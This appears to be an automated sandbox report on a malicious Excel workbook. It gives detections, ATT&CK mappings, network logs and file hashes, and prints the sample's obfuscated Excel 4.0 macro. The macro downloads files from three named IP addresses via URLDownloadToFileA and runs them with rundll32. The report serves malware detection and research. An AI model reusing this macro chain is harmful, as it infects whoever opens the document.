Analysis Report a5c5a139_by_Libranalysis
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ObfuscatedMacroInXLSM | Yara detected Obfuscated Macro In XLSM | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Data Obfuscation: |
---|
Yara detected Obfuscated Macro In XLSM | Show sources |
Source: | File source: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting11 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.198.57.83 | unknown | Netherlands | 60117 | HSAE | false | |
45.90.57.62 | unknown | Bulgaria | 204957 | GREENFLOID-ASUA | false | |
194.156.98.173 | unknown | Russian Federation | 135330 | ADCDATACOM-AS-APADCDATACOMHK | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 414449 |
Start date: | 14.05.2021 |
Start time: | 18:19:44 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 6s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | a5c5a139_by_Libranalysis (renamed file extension from none to xlsx) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.expl.evad.winXLSX@7/8@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.198.57.83 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
45.90.57.62 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
194.156.98.173 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
HSAE | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
GREENFLOID-ASUA | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
ADCDATACOM-AS-APADCDATACOMHK | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185386 |
Entropy (8bit): | 7.326521161282199 |
Encrypted: | false |
SSDEEP: | 3072:0LQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57do:0Lex0VAIu4bVYeVHrK5AySfahk8 |
MD5: | A6E3680B30CEC6746291E55B7D9B6975 |
SHA1: | E45C3A057F840EF4C96AB8233E1E21700BBDA199 |
SHA-256: | 89934494B26BCA1A6B28C2D262392548FA12CEBDF648E5F2DCD793CBF71FB261 |
SHA-512: | FD0DE48198B51F437ADFFC5A0F12880334047D177E67D92199EFEF09F697FC0771D738B28E47EAB17FD52A772AE74CEAFABFD0F7253C526B86D5ADD4912F712B |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 201556 |
Entropy (8bit): | 7.357000821698613 |
Encrypted: | false |
SSDEEP: | 6144:taBwxLex0VAIu4bVYeVHrK5AySfahklOGL7:ttlex0VbLbGeH+59SjEGX |
MD5: | EDA15C10E3180C047F6CDB5963A35AA8 |
SHA1: | 76FDEB42F4307B4DA7279C64F413736B407C6FED |
SHA-256: | B7A3CAB098B593EBAC220066576493F3AE525362C2C283DD93EE664DF0D3578C |
SHA-512: | 900AF245DCBBCA5FB7A6234B2485B61DE3D84E33F5A88F8BCDB02831E74402023D32CC8AC18C4DFDE59D56C73DE3BB8745ACEA4C50ABE9FA37A7D07F0BD58500 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.502712221051524 |
Encrypted: | false |
SSDEEP: | 12:85QaCLgXg/XAlCPCHaXtB8XzB/xs9ZX+WnicvbSR9bDtZ3YilMMEpxRljKt2TdJU:85U/XTd6jcZYe6Dv3qlrNru/ |
MD5: | 31D9A95EA06A55CCB6840E8E1F5C6EB7 |
SHA1: | 8CAD094E619443D49BBF2C5EF5E0D02DE9A93EDF |
SHA-256: | C53CD5D78F3A4A18351F722B683BECA2630CE31576186821BD443D53C1537DFD |
SHA-512: | FC73738150AB5C192151E3E33AF03AA52F56D0071D00B136AC97372D65ABECC792EFC46216D6A601086CE91BA55D98A414501CC48CAC81DC1AF31621BC9C321E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 4.606023709505623 |
Encrypted: | false |
SSDEEP: | 48:83/XT0jhfOOENr/hNCOOEylQh23/XT0jhfOOENr/hNCOOEylQ/:83/XojhfOFHNCOFylQh23/XojhfOFHNv |
MD5: | DC7596373682AD43A7733D42FE2A0A74 |
SHA1: | 2121DA076AEADE04038FFC86671D24132C5DB4D6 |
SHA-256: | DED727AA295B5484BC7B124BD554095FA6F5DDEE592B978DF2D16D4BCAF2767E |
SHA-512: | DCE6FA7BDA244278545E1AD3600E701351702E3A3C93F73FFB5B861073E75F928A67BD8430B58805B748BAB0722D2C1BA1F3BA9278354A84A73B12034930D0D8 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127 |
Entropy (8bit): | 4.670590395516913 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWPS6IUwSLMp6lcQHl6IUwSLMp6lmxWPS6IUwSLMp6lv:dj8hN2NXhNf |
MD5: | 41D0C0C77A2F9EA83301A886C932D7D2 |
SHA1: | 7E3FF4C55C5C7C3456C395AAD7105BF8E02DF356 |
SHA-256: | 1723978535AF19FDC47AA70EB6D687456981094429EF402E6CD768FB726B7DE2 |
SHA-512: | 508F4340A42840E74085FC4076E9308E97CD2CCA97E700CD191B67EC17E47FAE890DBDAF92917F4D76E53D35C6C11D5060DE9F1093DB45EC2287EBE78D6A3080 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 200665 |
Entropy (8bit): | 7.351335282810134 |
Encrypted: | false |
SSDEEP: | 3072:uEwLQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57dDOOLR:uxLex0VAIu4bVYeVHrK5AySfahkvOOLR |
MD5: | 8EB6632AB55682C48CAC51495A89946C |
SHA1: | 586F7CF6009A5F5EC008FF072720ED364F350A85 |
SHA-256: | 94154E914FC7661E71010367A385662CF250D034091E0EF2BA10CB1EADCA9A43 |
SHA-512: | 5976F09FD656A9A7C6E62A0883124FF35CDB43D0DF8975234EA30D033C6655672130917C84A466B4246DC6B72D5618F9CCE6294D3945E783D71C443A68ADDD29 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.361461703898337 |
TrID: |
|
File name: | a5c5a139_by_Libranalysis.xlsx |
File size: | 202458 |
MD5: | a5c5a139b458c718527f59afe34a759a |
SHA1: | a2743d88245ac25263afffd7f4dcbd0fe53e0bdf |
SHA256: | 16383e719fa9ff39d7d4dac2631fa8bfe0a6f63d5130c33053bc0db5e5aa1f89 |
SHA512: | 274978ae4caafc3474896b5b4478f59eacfd056f3a258bbd3c6fec7933586d93ba90dbbab5a90e10c0fcd47b4073ca287ada65ed1daabbb98abd5fa559306e2d |
SSDEEP: | 3072:ctbmLQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57dB:4mLex0VAIu4bVYeVHrK5AySfahk1 |
File Content Preview: | PK..........!..H.g............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "a5c5a139_by_Libranalysis.xlsx" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
"=FORMULA(Sheet000!J17&Sheet000!J22&Sheet000!J19,G19)=PI()=PI()=PI()"=HALT()
,,,"=FORMULA(Sheet000!P16,F27)=PI()=PI()=PI()",,,,,,,,,,,,"=NOW()&"".dat""",,,,,=,,,,REGIS,,,,"TER(""uRlM",,,,"=""htt""""on"",""URLDown",,"=""45.90.57.62/""","=JKKHYUGFD(0,G27&G28&E28&F23,""..\lertio.cersw"",0,0)",p://"loadToFileA"",""J",,"=""185.198.57.83/""","=JKKHYUGFD(0,G27&G28&E29&F23,""..\lertio.cersw1"",0,0)","JCCBB"",""JKKH",,"=""194.156.98.173/""","=JKKHYUGFD(0,G27&G28&E30&F23,""..\lertio.cersw2"",0,0)","YUGFD"",,1,9)",,,,,,,,,,,,,,,,,,,=GOTO(Sheet2!H13),
"=ON.TIME(NOW()+""00:00:02"",""Hot"")"=HALT()
"=FORMULA(Sheet000!J17&Sheet000!J21&Sheet000!J19,G19)=PI()=PI()=PI()"=GOTO(Sheet4!G5)
"=FORMULA(Sheet000!J17&Sheet000!J18&Sheet000!J19,H25)=PI()=PI()=PI()",,=,,,,"EXEC(""ru",,,,"ndll32 ""&""",,,,..\lertio.cersw,..\lertio.cersw1,..\lertio.cersw2,,"""&"",Dll",,,,Regist,,,,"erServer"")",,,,,,,,,,,,,,,,,,,,,,=GOTO(Sheet3!G2),,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/14/21-18:20:46.726203 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
05/14/21-18:20:47.007214 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
05/14/21-18:20:52.224764 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 14, 2021 18:20:46.480609894 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:20:46.521224022 CEST | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
May 14, 2021 18:20:46.521389008 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:20:46.522207022 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:20:46.561770916 CEST | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
May 14, 2021 18:20:46.726202965 CEST | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
May 14, 2021 18:20:46.726270914 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:20:46.752799034 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:20:46.808867931 CEST | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
May 14, 2021 18:20:46.809041023 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:20:46.809680939 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:20:46.865840912 CEST | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
May 14, 2021 18:20:47.007214069 CEST | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
May 14, 2021 18:20:47.007383108 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:20:47.018506050 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:20:50.027827024 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:20:50.279433012 CEST | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
May 14, 2021 18:20:50.279583931 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:20:50.280206919 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:20:50.531142950 CEST | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
May 14, 2021 18:20:52.224764109 CEST | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
May 14, 2021 18:20:52.224916935 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:21:51.728797913 CEST | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
May 14, 2021 18:21:51.728991985 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:21:52.008661985 CEST | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
May 14, 2021 18:21:52.008863926 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:21:57.228473902 CEST | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
May 14, 2021 18:21:57.228738070 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:22:46.409228086 CEST | 49167 | 80 | 192.168.2.22 | 194.156.98.173 |
May 14, 2021 18:22:46.409770966 CEST | 49166 | 80 | 192.168.2.22 | 185.198.57.83 |
May 14, 2021 18:22:46.411212921 CEST | 49165 | 80 | 192.168.2.22 | 45.90.57.62 |
May 14, 2021 18:22:46.450882912 CEST | 80 | 49165 | 45.90.57.62 | 192.168.2.22 |
May 14, 2021 18:22:46.463902950 CEST | 80 | 49166 | 185.198.57.83 | 192.168.2.22 |
May 14, 2021 18:22:46.659295082 CEST | 80 | 49167 | 194.156.98.173 | 192.168.2.22 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 45.90.57.62 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 14, 2021 18:20:46.522207022 CEST | 0 | OUT | |
May 14, 2021 18:20:46.726202965 CEST | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49166 | 185.198.57.83 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 14, 2021 18:20:46.809680939 CEST | 1 | OUT | |
May 14, 2021 18:20:47.007214069 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49167 | 194.156.98.173 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 14, 2021 18:20:50.280206919 CEST | 3 | OUT | |
May 14, 2021 18:20:52.224764109 CEST | 4 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 18:20:43 |
Start date: | 14/05/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f130000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:20:55 |
Start date: | 14/05/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffd20000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:20:55 |
Start date: | 14/05/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffd20000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:20:55 |
Start date: | 14/05/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffd20000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|